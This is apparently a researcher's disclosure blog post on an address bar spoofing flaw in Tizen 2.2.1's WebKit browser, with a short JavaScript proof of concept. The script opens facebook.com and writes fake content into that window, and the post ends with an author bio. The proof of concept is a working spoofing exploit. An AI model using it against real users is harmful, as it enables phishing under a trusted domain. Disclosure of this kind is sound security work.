Tizen 2.2.1 WebKit Address Spoofing

Posted by Ajin Abraham on Dec 23 2014

TL;DR

Vulnerability in Tizen 2.2.1's default web browser based on webkit allowed address bar spoofing where an attacker can show arbitrary content for the URL of choice.

While doing research on Tizen operating system, I found a vulnerability in the default web browser that uses WebKit. It is an address bar spoofing vulnerability that allows an attacker to show a webpage with arbitrary content and set it to any URL or domain of choice. This was a previously identified webkit bug that was not fixed in Tizen's  browser implementation.

Screenshot PoC


PoC Code

<!--
Title: Tizen 2.2.1 WebKit Address Spoofing Vulnerability
Author: Ajin Abraham | @ajinabraham
Website: http://opensecurity.in
Affected Product: Tizen Default Browser
Affected Version: Tizen 2.2.1
-->
<html>
<head><title>Tizen Browser - Address bar spoofing</title>
<script>
w=window.open('https://facebook.com/');
w.document.write("<h1>You 've been Hacked</h1>");
w.focus();
</script>
</html>


Video


  • Tags: 
  • tizen
  • tizen webkit
  • address spoofing
  • tizen webkit exploit
  • tizen webkit vulnerability
  • url spoofing
  • address bar spoofing

Ajin Abraham

  • |
  • |
  • |

Ajin Abraham is a Security Engineer with 7+ years of experience in Application Security including 4 years of Security Research. He is passionate on developing new and unique security tools. Some of his contributions to Hacker's arsenal include OWASP Xenotix XSS Exploit Framework, Mobile Security Framework (MobSF), Droid Application Fuzz Framework (DAFF), Xenotix xBOT, NodeJsScan etc to name a few. He has been invited to speak at multiple security conferences including ClubHack, Nullcon, OWASP AppSec Eu, OWASP AppSec AsiaPac, BlackHat Europe, Hackmiami, Confidence, BlackHat US, BlackHat Asia, ToorCon, Ground Zero Summit, Hack In Paris, Hack In the Box, c0c0n and PHDays.